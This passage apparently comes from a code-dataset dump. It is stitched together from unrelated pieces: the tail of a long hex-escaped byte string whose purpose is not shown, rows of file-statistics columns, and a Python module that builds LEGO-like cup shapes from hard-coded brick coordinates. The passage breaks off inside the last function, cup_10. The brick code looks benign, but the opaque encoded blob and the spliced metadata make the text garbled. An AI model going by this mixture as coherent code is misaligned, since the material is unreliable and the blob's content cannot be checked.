9f\x9d\xc3\x69\xa9\x44\x5a\x4b\x2c\xe5\x12\x85\x26\xba\x9d\x79\x99\x56\x02\x47\x78\xb1\x5f\xbf\x05\xb4\x77\xec\x76\x1d\x6e\xad\x49\x72\x67\x48\x34\x55\x32\x0e\xed\x74\x5b\x7b\xc7\xd5\xd4\xf5\xf3\xc9\x55\x0e\xe6\x2b\x09\xd2\xb1\xb8\x2e\x00\xd6\xae\xa3\x44\x05\x9f\x22\x6d\x08\x78\x9c\x67\xff\x41\xe8\xac\x75\x6f\x3c\xf8\x81\x0d\xae\x6e\xa2\xba\xf0\xaa\xc3\x9f\x82\x10\x41\xb3\xa9\xd9\xf8\x64\x96\x8c\x9b\x6a\x96\x15\x90\x37\x40\xf8\x4c\x42\xba\xf2\x62\x27\xe2\x68\x89\x12\x15\xe6\x5c\xcc\x70\x36\x36\xd9\x2b\xfa\xac\xed\xb6\xe1\xd2\x15\x17\x15\x91\x0d\x83\x47\x54\x05\xad\x47\x41\xfa\x30\x96\xba\xf5\x30\x49\x5e\x08\x50\x80\xa3\x4e\x12\x09\x6d\x81\x7d\x59\xae\x05\xf2\x06\x61\x15\xc6\x70\x41\x9a\x79\x08\xa5\xce\xe9\x89\xcd\x18\xaa\x26\xa7\x24\x6f\x93\xcb\xa5\x4d\xd3\xb8\x61\x63\x02\x99\x29\xc9\xd1\x86\x1a\x76\x43\x19\x4e\x44\xbf\x3f\xc6\x74\xdc\xb9\xa5\x69\x0b\xb4\xaa\xdb\x96\xf9\x35\x9b\x13\x20\x7c\xa6\xa6\x8a\xa2\xca\xe6\x2b\x7f\xb5\x86\x6e\xa5\x7f\x29\x45\xf7\x78\x4e\x39\x5a\xcd\xda\xf6\xb8\xf0\xc8\x75\x39\xdb\x53\x8c\xbb\xf2\x0e\xda\x9d\xe8\x5d\x43\x76\xf9\x
cf\xca\xb3\x77\x93\xb0\x3e\x8d\x10\x51\xa5\xb8\x83\xc4\x10\x74\xdc\x82\x03\x41\xec\x3a\x2e\x5e\x80\x85\x34\x2f\x40\x72\xdd\x91\xea\xac\x74\x9d\xd9\xe5\xd4\xb0\x4f\x41\xa6\x52\x38\xea\x51\xa6\x5e\x0e\x28\x7e\x1f\x36\xdd\xd2\xd4\x26\xdc\x4b\x88\x06\x5b\x51\xa1\x46\x95\x51\xb7\xb2\xb6\x2f\x46\xa2\xef\x6e\x93\x9b\x81\x57\x31\xbe\x69\xed\x8b\x7f\x82\xa5\xa0\x6c\x53\x70\x50\x77\x5d\x8e\x5d\x21\x65\x85\x91\xe0\x74\x09\x7c\xd6\x0c\xf5\x2b\xbb\x64\x1c\x0f\x01\x1d\x17\x03\x27\xdf\xfa\x49\xe9\xcc\x75\xeb\xfd\x91\x93\x32\x1d\x66\x69\xb1\xe5\x0d\x4d\x69\xfb\x97\x6b\x83\x10\x37\x70\xd2\xef\x96\xa9\x40\xdb\xd2\x45\x48\xd5\x40\x0a\x8f\x6c\xbd\x0e\x53\x26\x4e\xed\x3b\xa9\x0a\x67\x52\x66\xee\xf3\x41\xc1\x82\xad\xee\xf8\x4e\xa6\x12\x1d\xf5\xb5\xe9\x2d\xb6\xac\x4b\x0f\x13\xe9\x33\xf7\xbf\xbd\xd3\x6f\xd1\x05\xc9\x3c\x46\x0d\x62\x71\x29\x1b\xae\x70\x50\x05\xc6\x05\x3b\x74\x47\x56\xa4\x68\x3e\x36\x5b\xc9\x1d\x2f\xbc\xe0\x81\xfd\x8f\xc9\x7c\x65\x26\xc2\x2d\x84\x91\xc5\x52\xa9\xe8\x7a\x0d\x79\x3b\xe4\x37\x6f\xd5\x87\x17\x58\x34\xe1\x97\xc2\xbc\x09\xbd\xdc\xcc\xe3\xa5\xe7\x38\x2f\x95\x79\x55\x6e\xaf\x6f\x89\x14\xaa\x37\xbc\x3b\xf2\x64\x06\x56\xc1\xba\xb0\x6a\xb3\xcd\x90\x29\x31\xdb\x12\x6c\x6a\x84\xd4\xc4\x98\x0a\xac\xbf\x55\x24\xc5\x69\x51\xba\xbd\x4c\x3d\xae\x66\x83\x6a\xef\x2f\xf5\x08\x4e\x16\x92\xf5\xa1\xd6\xe3\xf1\x4e\xf0\x6d\x2f\x7a\xa9\x98\x67\x55\x3e\xfd\x41\xfe\x98\xa7\x24\x1e\x56\x8c\x97\x1a\x4d\x8b\xb1\x06\x64\x72\x09\x92\xa2\x0c\x17\x36\x1f\x38\x5c\x64\x94\x70\x15\xad\xc5\x9d\x9e\x64\x74\x2c\x81\x1b\x19\xe5\x2a\x99\xce\xd4\x0b\x13\x2a\x58\x81\xd0\x6b\xe8\xf6\x7f\xf6\xe7\x1b\xaf\x43\x42\x33\x2f\x6f\x28\xed\x83\x41\xd7\x24\x34\xe4\xc0\xcf\x6b\xb7\xfe\xa8\x9f\x10\x86\x11\x43\xd3\xf5\xf9\x05\xc1\xf6\x36\xd0\x24\xd1\xee\x0d\xd6\xea\x35\xc1\x2d\x1a\x68\xe8\xe5\x19\xdc\xe0\xc2\x2d\x12\x60\xf4\xa6\x08\x70\x56\x84\x82\x2c\x61\x07\x42\xf5\x93\x1b\x3f\x37\x22\xa3\x81\x34\x8c\x02\x83\x00\x11\x80\x5b\x04\x62\x32\xf5\x9e\x69\xbc\x94\xf3\x16\x9d\x32\x37\xe8\xa5\x1d\x55\x3c\xa7\x33\x96\xeb\xde\x
45\x71\xfd\x29\x80\x58\x4c\xf3\x8b\xb8\x00\x20\x27\x2e\x8c\x81\x7c\x1d\x03\x1a\x58\x0c\x0b\x46\xa0\x1b\x47\x5f\x2c\x2e\xf0\x30\x9c\xd1\x52\x0f\x8a\xc1\xbc\xcf\x16\x57\x42\x98\xdf\x7c\x5b\xad\xcf\x26\x3f\x46\xf0\x36\x79\xbf\x15\x94\xc4\x4e\x44\x19\x1a\xb6\x47\xab\x01\x63\x4e\x41\x77\xa3\x38\x31\xb9\x30\xd3\x4a\x97\xe7\x19\xff\x11\x7d\x25\xb5\x46\x83\x5f\x79\x53\xca\x75\x5b\xc2\x11\x7f\x2f\xf5\x8e\x37\x4c\x3a\xf4\x7d\xb1\x34\x3f\x29\x1a\xa5\x1f\xe5\x54\x5d\xdc\x91\x81\x3a\x73\x19\xbc\xc0\xc4\x15\x12\x93\x71\x90\xdf\x20\xa8\xef\xdf\x5a\x73\x83\x89\xc5\x17\x7f\xd9\x20\x29\x00\xed\x5c\xec\x77\xa4\x4d\x4b\x9b\x0a\x49\x70\xa3\xcf\x9a\xb6\xa9\x62\xc1\x0c\x03\x60\xcb\x87\x74\x04\x5e\xa1\x78\xd1\xa3\x48\x2f\xe3\x64\xd2\x55\x3d\x7d\x24\x96\xfe\x37\x60\x32\x02\x67\xf5\x88\x83\x7f\x5e\xe6\x0b\x9f\x7c\xad\x92\x78\x69\x37\xdf\x30\x7d\xe2\xcb\xef\x88\xed\x2c\x85\x79\x53\x88\x7e\x7c\xf6\x23\x77\xb1\xee\xf0\xcf\x01\x3e\x8c\x57\x0a\xff\xb2\x8e\x8e\x4e\x47\x26\xc1\x98\x68\xeb\xf8\x8c\xe9\x9b\x32\xb0\x34\xd2\x24\x73\x35\x86\x30\x4f\x6f\x5e\x09\x10\x8a\xac\xd1\xc7\x31\xad\x0d\xa1\x16\x75\x29\x46\x4a\x76\x61\xee\x30\x60\x3b\x86\x1a\xf0\xad\xc0\x75\x19\xc4\x4d\x72\x63\x49\xf9\x47\x27\xe1\x44\x71\x71\x72\xad\xa7\x5b\x02\xc9\x6f\x5d\x4b\xdf\x92\x31\x99\xe8\xc8\x5a\x29\xce\x35\x23\x50\xf6\x2b\x5d\x00\xd8\x63\x4c\x07\x42\x49\xe1\xe2\x11\x47\xae\x5e\xf3\xdc\xc1\x70\x50\x4d\x79\xed\x31\xa3\x06\xf6\x05\xd2\xf5\xd0\x71\x6b\x1a\x23\x09\x8d\xc2\xd0\xda\x50\x94\x47\x42\x2b\x9b\x80\x11\xed\x3d\x95\x83\x56\xf7\x0f\x73\x2e\x49\x5b\x22\xbd\xe1\x3d\xac\x30\xdd\x45\x00\xb4\xa0\x90\x0e\x7f\xbd\x3f\xc6\x1f\xd1\x81\x21\x55\x20\xf3\x0d\x1e\x0d\x83\x5f\x30\x87\x6e\xc0\xfb\xf9\x78\x28\xe2\xa0\xa7\x36\x86\xe0\x59\xb4\x90\xa1\xe4\xda\x7e\x95\x55\x06\xf6\xc8\xa0\xe5\x2a\xb2\x91\x76\x25\x11\x9d\xf5\xc3\x8c\xd3\xfc\x9a\x45\x2e\x3f\x71\x12\x8a\x8f\x28\x44\xc1\xab\x4c\x84\x06\x9e\xf7\x0b\xfd\x74\xd5\x9d\x06\xa5\xa5\x48\xa3\x8a\xe0\x5d\x89\x0f\x56\x02\x85\x8d\x9d\x63\x6c\x85\x59\x8d\x6d\xaa\xe2\xe7\xeb\xa2\xc4\xfb\x9d\x
91\xfa\x25\xfb\x4c\xe7\xc1\x7e\x6f\x08\xe9\x25\x0d\x37\xc9\xa0\x4f\xb1\xd7\x90\x99\xf4\x5e\x2c\x74\xc7\x32\x64\xcd\xac\x6a\x67\xe9\x08\x1a\x42\x65\x64\xc9\x71\x8c\xf7\x22\x64\x88\x49\x06\xd6\x33\x81\xa4\xc9\x0c\x72\xb0\x87\x66\x11\x5e\xa3\xa8\x0d\x18\xd3\x30\x25\x39\x94\x04\xe5\xca\x2b\x9d\x15\xd4\xd2\x46\x9b\x07\x9e\x22\x94\x4b\xc6\x34\x9a\xbe\xc6\x20\x68\x25\x52\x6a\xba\xf5\x49\x4b\x45\x85\xa7\xea\x99\x33\x3c\x68\x72\xe8\x4f\x7b\x17\xb4\xa3\x89\xbf\x85\xae\xbc\x96\x67\xf7\x01\x84\x53\x94\xcd\xf1\xee\xa4\xf4\xa9\xf5\x90\xcf\xb0\x59\x6a\xcf\xe4\x30\xb7\x32\xf1\x45\x61\x12\xf2\xd4\xbd\x51\x7b\x08\x8e\x3c\x7d\x5f\x42\x25\xfc\x7a\xfd\x8f\x72\xb7\x12\x4e\x37\x92\xf3\xe9\x02\x38\xee\x3d\xd5\x4c\x5e\xce\x66\x48\xb6\xed\x46\x18\xe8\x9e\x0f\x1e\x38\xd2\x60\xd9\x80\xc6\x1a\xde\x56\x4d\x4f\x7e\xce\x12\xad\x8f\xd3\x6d\xf6\x84\x28\x6f\x93\xf8\x4f\x66\x9a\x8f\x9c\xfd\xc2\xe0\x6d\x30\x05\xce\xa6\x27\x20\x1d\x32\x52\x89\x16\xe4\x97\xed\x81\x2b\x2b\x83\x04\x54\xcd\x43\xe2\x5f\x39\xd9\x7a\x8d\x31\xad\x68\xde\x4b\xa1\x17\x4e\x98\x15\x2b\xc3\xce\x31\xd3\x11\xfa\x1e\x4a\xd6\xdf\x12\x56\x57\x51\x07\x0b\x64\x40\x2b\x94\x29\xd4\x51\x51\xe4\x21\x46\x33\x2c\x7d\x81\xcb\xef\xeb\xb7\xcd\x8b\x28\xb2\x06\x46\xed\xde\xb3\x14\x02\x62\x2f\x1b\x9a\x19\x2e\x7b\x3f\x76\x37\x14\x61\x66\x80\x41\xe6\x15\x14\x15\x18\x52\x63\xfe\xd3\x1b\xa2\xe6\x6c\x1c\x15\x76\xdf\x88\xfc\x97\x3a\x6a\x2a\x04\x44\x70\xa4\x02\xbc\x08\xee\x0d\x86\x86\xca\x87\xb5\x6e\x49\x92\x34\x60\x41\x88\xd6\xb4\xc2\x81\x89\x74\xef\xe1\xa1\x24\x80\xa2\x6a\x74\xb4\xb2\x1d\x46\x32\x39\x7d\xcd\x4d\xaa\x25\x6b\xd0\xa0\x44\x6e\x30\x87\x18\x7d\x37\x3b\xbd\x0c\x46\x3e\xb4\xd3\x37\x8b\x4c\x75\x20\x5e\xdb\x68\x9d\xf7\x39\x3a\xa7\x4c\x01\x2d\x02\x72\xc2\xb9\x3c\xd9\x20\xf9\x01\xfb\x28\xc6\x3f\xf9\xd8\xc4\x47\xbe\x90\x94\xce\x9c\x0b\xe9\x18\xce\x0f\x98\x3f\x07\x8c\x3b\x04\x65\x99\xd7\x2c\xae\x07\x9f\xf1\x87\xec\x19\xda\x2d\x4a\x49\x94\x77\x01\x10\x69\xf7\x34\xdc\x16\xb1\x8c\x0c\xb3\xe3\x5f\xc7\x17\x30\x50\xdc\x1c\xca\x4d\xdc\xf0\x28\x7c\x67\xfe\xc4\x
f0\x70\x9c\x2a\xc6\x6f\xbc\x8f\x73\xca\xf2\x8d\x7c\x35\x13\x05\x52\xf5\x19\xad\xd4\xef\xcd\xee\x02\x93\xb4\x03\x0f\x0d\xee\x23\xf1\xdb\x6d\x3c\xe7\x8e\x12\x5d\xf9\x40\xda\xbd\x09\x96\xf2\x22\xdd\x60\x0e\x64\x59\xf1\xb4\xb3\xd8\x25\xc8\x7d\xb5\x56\xb7\x16\xdf\xa2\x72\xf4\x86\xce\x96\x1a\x2d\x50\x10\x79\x9c\xcf\xea\xd4\x9b\xab\xf6\xe1\x89\xa1\x64\xa2\x91\xbe\x73\x2a\x0f\xe3\xba\x8a\xd4\x81\x45\x78\x16\xd2\x8c\x19\x8a\xee\xe3\xd2\xd1\xe7\x9c\xb0\x56\x66\x4a\x89\x79\xf4\xab\xf0\x17\x62\xae', 1)
| 48,495
| 48,495
| 0.749995
| 12,119
| 48,495
| 3.000165
| 0.021536
| 0.00066
| 0.000495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.315269
| 0.000062
| 48,495
| 1
| 48,495
| 48,495
| 0.434525
| 0
| 0
| 0
| 0
| 1
| 0.999175
| 0.999175
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
752a47d4dcab55ac47efba96726a74453078372b
| 75,662
|
py
|
Python
|
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
src_dataset/dataset_cup.py
|
jamesrchen/Combinatorial-3D-Shape-Generation
|
0f2dc9a4c6f5844cbce53fe4f2b7244cadf6231e
|
[
"MIT"
] | null | null | null |
from geometric_primitives import brick
from geometric_primitives import bricks
import dataset_common
def cup_1():
    """Build and return the first cup-shaped brick assembly.

    Each entry below is a (position, direction) pair for one brick
    (presumably a standard 2x4 LEGO-style brick — see geometric_primitives;
    confirm there). Bricks are added in the same order the original
    hand-unrolled code used, since bricks.Bricks.add may validate
    connectivity incrementally.
    """
    bricks_ = bricks.Bricks(40)

    # Rim / wall bricks, listed explicitly.
    placements = [
        ([0, 0, 3], 1),
        ([-1, 1, 4], 0),
        ([-1, 3, 3], 0),
        ([-1, 5, 4], 0),
        ([0, 6, 3], 1),
        ([2, 0, 4], 1),
        ([2, 6, 4], 1),
        ([4, 0, 3], 1),
        ([4, 6, 3], 1),
        ([6, 0, 4], 1),
        ([6, 6, 4], 1),
        ([7, 1, 3], 0),
        ([7, 5, 3], 0),
        ([7, 3, 4], 0),
    ]
    # Two base rows of five bricks each at z == 2.
    placements += [([idx * 2 - 1, 1, 2], 0) for idx in range(5)]
    placements += [([idx * 2 - 1, 5, 2], 0) for idx in range(5)]

    for position, direction in placements:
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        bricks_.add(piece)
    return bricks_
def cup_2():
    """Build and return the second cup-shaped brick assembly.

    Placements are (position, direction) pairs; the list reproduces the
    original hand-unrolled sequence exactly, in the same order, because
    bricks.Bricks.add may check each brick against those already placed.
    """
    bricks_ = bricks.Bricks(40)

    # Lower wall ring, listed explicitly.
    placements = [
        ([0, 0, 3], 1),
        ([-1, 1, 4], 0),
        ([-1, 3, 3], 0),
        ([-1, 5, 4], 0),
        ([0, 6, 3], 1),
        ([2, 0, 4], 1),
        ([2, 6, 4], 1),
        ([4, 0, 3], 1),
        ([4, 6, 3], 1),
        ([5, 1, 4], 0),
        ([5, 5, 4], 0),
        ([5, 3, 3], 0),
    ]
    # Two base rows of four bricks each at z == 2.
    placements += [([idx * 2 - 1, 1, 2], 0) for idx in range(4)]
    placements += [([idx * 2 - 1, 5, 2], 0) for idx in range(4)]
    # Two stacked upper rings (z == 5 and z == 6), eight bricks per level.
    for level in range(2):
        z = level + 5
        placements += [
            ([-2, 0, z], 0),
            ([-2, 4, z], 0),
            ([1, -1, z], 1),
            ([5, -1, z], 1),
            ([6, 2, z], 0),
            ([6, 6, z], 0),
            ([-1, 7, z], 1),
            ([3, 7, z], 1),
        ]

    for position, direction in placements:
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        bricks_.add(piece)
    return bricks_
def cup_3():
    """Build and return the third cup assembly (taller body plus a handle).

    Placements are (position, direction) pairs generated in exactly the
    original order. Boolean terms like ``4 + (i % 2 == 1)`` intentionally
    rely on Python's bool-as-int arithmetic (adds 1 on odd indices) and
    are preserved verbatim.
    """
    bricks_ = bricks.Bricks(100)

    placements = [([0, 0, 3], 1)]
    # Left wall: alternate z between 4 and 5.
    placements += [([-1, k * 2 + 1, 4 + (k % 2 == 1)], 0) for k in range(3)]
    # Front column at x == 0.
    placements += [([0, k * 2 + 2, 3], 1) for k in range(3)]
    # Four corner bricks; z alternates 4/3 with even/odd i.
    for a in range(2):
        for b in range(2):
            placements.append(([a * 2 + 2, b * 6, 3 + (a % 2 == 0)], 1))
    placements += [([5, k * 4 + 1, 4], 0) for k in range(2)]
    placements += [([4, k * 2 + 2, 3], 1) for k in range(2)]
    # Handle: lower attachment, vertical run, top attachment.
    placements += [([7, k * 2 + 2, 5], 1) for k in range(2)]
    placements += [([9, 3, 6 + k], 0) for k in range(4)]
    placements += [([7, k * 2 + 2, 10], 1) for k in range(2)]
    placements += [([5, 3, 6 + k], 0) for k in range(4)]
    # Main body: two-by-two footprint, seven layers tall.
    for a in range(2):
        for b in range(2):
            for c in range(7):
                placements.append(([a * 4, b * 6, 5 + c], 1))
    # Back spine.
    placements += [([-1, 3, 6 + k], 0) for k in range(6)]
    placements.append(([5, 3, 11], 0))

    for position, direction in placements:
        piece = brick.Brick()
        piece.set_position(position)
        piece.set_direction(direction)
        bricks_.add(piece)
    return bricks_
def cup_4():
    """Assemble the hard-coded brick layout for stage "cup 4".

    Returns a ``bricks.Bricks`` container (capacity 150) filled with
    bricks at fixed positions.  Boolean terms like ``(i % 2 == 1)``
    contribute 0 or 1 to the coordinate, alternating brick height.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 3], 1)
    for i in range(2):
        put([-1 - (i % 2 == 1), i * 2 + 1, 4 + (i % 2 == 1)], 0)
    put([0, 2, 3], 1)
    put([-2, -1, 5], 0)
    for i in range(5):
        put([i * 2 - 1, 4, 4 + (i % 2 == 1)], 1)
    for i in range(3):
        put([8 - (i % 2 == 1), 3 - i * 2, 5 - (i % 2 == 1)], 0)
    for i in range(2):
        put([6, i * 2, 3], 1)
    for i in range(5):
        put([i * 2 - 1, -2, 4 + (i % 2 == 1)], 1)
    for i in range(2):
        put([3, i * 4 - 1, 3], 0)
    for i in range(2):
        put([0, i * 6 - 2, 3], 1)
    for i in range(2):
        put([6, i * 6 - 2, 3], 1)
    for i in range(2):
        for j in range(2):
            for k in range(2):
                put([i * 4 - 1, j * 6 - 2, 6 + k], 1)
    put([-2, 1, 6], 0)
    put([-3, 1, 7], 0)
    for i in range(2):
        put([6, i * 4 - 1, 6], 0)

    for b in placed:
        container.add(b)
    return container
def cup_5():
    """Assemble the hard-coded brick layout for stage "cup 5".

    Returns a ``bricks.Bricks`` container (capacity 150) filled with
    bricks at fixed positions; a wider variant of the cup_4 layout.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 3], 1)
    for i in range(2):
        put([-1 - (i % 2 == 1), i * 2 + 1, 4 + (i % 2 == 1)], 0)
    put([0, 2, 3], 1)
    put([-2, -1, 5], 0)
    for i in range(7):
        put([i * 2 - 1, 4, 4 + (i % 2 == 1)], 1)
    for i in range(3):
        put([12 - (i % 2 == 1), 3 - i * 2, 5 - (i % 2 == 1)], 0)
    for i in range(2):
        put([10, i * 2, 3], 1)
    # Disabled in the original (was a no-op triple-quoted block):
    # put([-1, -3, 3], 0)
    for i in range(2):
        put([-1 - (i % 2 == 1), -3 - i * 2, 4 + (i % 2 == 1)], 0)
    for i in range(2):
        put([11 + (i % 2 == 1), -3 - i * 2, 4 + (i % 2 == 1)], 0)
    for i in range(2):
        put([0, -2 - i * 2, 3], 1)
    for i in range(2):
        put([10, -2 - i * 2, 3], 1)
    for i in range(7):
        put([i * 2 - 1, -6, 4 + (i % 2 == 1)], 1)
    for i in range(3):
        for j in range(2):
            put([i * 2 + 3, j * 6 - 4, 3], 0)
    for i in range(3):
        put([i * 2 + 3, -1, 2], 0)
    for i in range(2):
        put([14, i * 2 - 2, 6], 1)
    for i in range(2):
        for j in range(5):
            put([16 - i * 4, -1, 7 + j], 0)
    for i in range(3):
        for j in range(2):
            for k in range(7):
                put([i * 4 + 1, j * 10 - 6, 6 + k], 1)
    for i in range(3):
        for k in range(6):
            put([-2, 3 - i * 4, 6 + k], 0)
    for i in range(3):
        put([-2 - (i % 2 == 1), 3 - i * 4, 12], 0)
    for i in range(2):
        for j in range(7):
            put([12, i * 8 - 5, 6 + j], 0)
    for i in range(2):
        put([14, i * 2 - 2, 12], 1)

    for b in placed:
        container.add(b)
    return container
def cup_6():
    """Assemble the hard-coded brick layout for stage "cup 6".

    Returns a ``bricks.Bricks`` container (capacity 150): a rectangular
    perimeter ring topped by four corner towers.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 3], 1)
    for i in range(5):
        put([-1, i * 2 + 1, 3 + (i % 2 == 0)], 0)
    for i in range(5):
        put([i * 2, 10, 3 + (i % 2 == 1)], 1)
    for i in range(5):
        put([9, 9 - i * 2, 3 + (i % 2 == 0)], 0)
    for i in range(4):
        put([8 - i * 2, 0, 3 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            put([i * 6 + 1, j * 2 + 2, 2], 1)
    for i in range(4):
        put([4, i * 2 + 2, 3], 1)
    for i in range(2):
        for j in range(3):
            for k in range(5):
                put([i * 10 - 1, j * 4 + 1, 5 + k], 0)
    for i in range(2):
        for j in range(2):
            for k in range(5):
                put([i * 4 + 2, j * 10, 5 + k], 1)

    for b in placed:
        container.add(b)
    return container
def cup_7():
    """Assemble the hard-coded brick layout for stage "cup 7".

    Returns a ``bricks.Bricks`` container (capacity 150): the cup_6 base
    ring extended upward through several stacked wall tiers, capped by a
    second perimeter ring at z = 15.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    # Base perimeter ring at z = 3/4.
    put([0, 0, 3], 1)
    for i in range(5):
        put([-1, i * 2 + 1, 3 + (i % 2 == 0)], 0)
    for i in range(5):
        put([i * 2, 10, 3 + (i % 2 == 1)], 1)
    for i in range(5):
        put([9, 9 - i * 2, 3 + (i % 2 == 0)], 0)
    for i in range(4):
        put([8 - i * 2, 0, 3 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(4):
            put([i * 6 + 1, j * 2 + 2, 2], 1)
    for i in range(4):
        put([4, i * 2 + 2, 3], 1)
    for i in range(2):
        put([4, i * 4 + 3, 2], 0)
    # First wall tier (z = 5..6).
    for i in range(2):
        for j in range(2):
            put([0, i * 4 + 4, 5 + j], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 1, 1, 5 + j], 1)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 3, 9, 5 + j], 1)
    for i in range(2):
        for j in range(2):
            put([8, i * 4 + 2, 5 + j], 0)
    for i in range(3):
        put([9, i * 2 + 3, 7], 1)
    for i in range(2):
        put([12, i * 2 + 4, 8], 1)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 3, j * 8 + 1, 7], 1)
    for i in range(2):
        put([0, i * 4 + 3, 7], 0)
    # Second wall tier (z = 8..11).
    for i in range(2):
        for j in range(4):
            put([0, i * 4 + 4, 8 + j], 0)
    for i in range(2):
        for j in range(4):
            put([i * 4 + 1, 1, 8 + j], 1)
    for i in range(2):
        for j in range(4):
            put([i * 4 + 3, 9, 8 + j], 1)
    for i in range(2):
        for j in range(4):
            put([8, i * 4 + 2, 8 + j], 0)
    for i in range(2):
        for j in range(3):
            put([i * 4 + 10, 5, 9 + j], 0)
    for i in range(2):
        put([12, i * 2 + 4, 12], 1)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 3, j * 8 + 1, 12], 1)
    for i in range(2):
        put([0, i * 4 + 3, 12], 0)
    put([9, 5, 12], 0)
    # Third wall tier (z = 13..14).
    for i in range(2):
        for j in range(2):
            put([0, i * 4 + 4, 13 + j], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 1, 1, 13 + j], 1)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 3, 9, 13 + j], 1)
    for i in range(2):
        for j in range(2):
            put([8, i * 4 + 2, 13 + j], 0)
    # Top perimeter ring at z = 15/16.
    put([0, 0, 15], 1)
    for i in range(5):
        put([-1, i * 2 + 1, 15 + (i % 2 == 0)], 0)
    for i in range(5):
        put([i * 2, 10, 15 + (i % 2 == 1)], 1)
    for i in range(5):
        put([9, 9 - i * 2, 15 + (i % 2 == 0)], 0)
    for i in range(4):
        put([8 - i * 2, 0, 15 + (i % 2 == 1)], 1)

    for b in placed:
        container.add(b)
    return container
def cup_8():
    """Assemble the hard-coded brick layout for stage "cup 8".

    Returns a ``bricks.Bricks`` container (capacity 150): two identical
    small perimeter rings (z = 6 and z = 8) over a solid stem and base.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    def ring(z):
        # One small rectangular perimeter ring, alternating heights.
        put([0, 0, z], 1)
        for i in range(3):
            put([-1, i * 2 + 1, z + (i % 2 == 0)], 0)
        for i in range(3):
            put([i * 2, 6, z + (i % 2 == 1)], 1)
        for i in range(3):
            put([5, 5 - i * 2, z + (i % 2 == 0)], 0)
        for i in range(2):
            put([4 - i * 2, 0, z + (i % 2 == 1)], 1)

    ring(6)
    ring(8)
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 5], 1)
    for i in range(2):
        for j in range(3):
            put([2, i * 2 + 2, 4 - j], 1)
    for i in range(2):
        put([i * 4, 3, 1], 1)
    for i in range(2):
        put([2, i * 4 + 1, 1], 1)
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 0], 1)

    for b in placed:
        container.add(b)
    return container
def cup_9():
    """Assemble the hard-coded brick layout for stage "cup 9".

    Returns a ``bricks.Bricks`` container (capacity 150): three stacked
    small perimeter rings (z = 4, 6, 8) with a floor under the lowest.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    def ring(z):
        # One small rectangular perimeter ring, alternating heights.
        put([0, 0, z], 1)
        for i in range(3):
            put([-1, i * 2 + 1, z + (i % 2 == 0)], 0)
        for i in range(3):
            put([i * 2, 6, z + (i % 2 == 1)], 1)
        for i in range(3):
            put([5, 5 - i * 2, z + (i % 2 == 0)], 0)
        for i in range(2):
            put([4 - i * 2, 0, z + (i % 2 == 1)], 1)

    ring(4)
    for i in range(2):
        for j in range(4):
            put([i * 4, j * 2, 3], 1)
    ring(6)
    ring(8)

    for b in placed:
        container.add(b)
    return container
def cup_10():
    """Assemble the hard-coded brick layout for stage "cup 10".

    Returns a ``bricks.Bricks`` container (capacity 150): a large
    perimeter ring at z = 5 over a multi-level enclosed base, with a
    handle-like column on the +x side.
    """
    container = bricks.Bricks(150)
    placed = []

    def put(pos, facing):
        # Create one brick, configure it, and queue it for insertion.
        b = brick.Brick()
        b.set_position(pos)
        b.set_direction(facing)
        placed.append(b)

    put([0, 0, 5], 1)
    for i in range(5):
        put([-1, i * 2 + 1, 5 + (i % 2 == 0)], 0)
    for i in range(5):
        put([i * 2, 10, 5 + (i % 2 == 1)], 1)
    for i in range(5):
        put([9, 9 - i * 2, 5 + (i % 2 == 0)], 0)
    for i in range(4):
        put([8 - i * 2, 0, 5 + (i % 2 == 1)], 1)
    for i in range(2):
        for j in range(3):
            put([i * 10 - 1, j * 4 + 1, 7], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 2, j * 10, 7], 1)
    for i in range(2):
        put([0, i * 4 + 3, 8], 0)
    for i in range(2):
        put([8, i * 8 + 1, 8], 0)
    for i in range(2):
        for j in range(2):
            put([i * 4 + 1, j * 10, 8], 1)
    for i in range(2):
        put([10, i * 2 + 4, 8], 1)
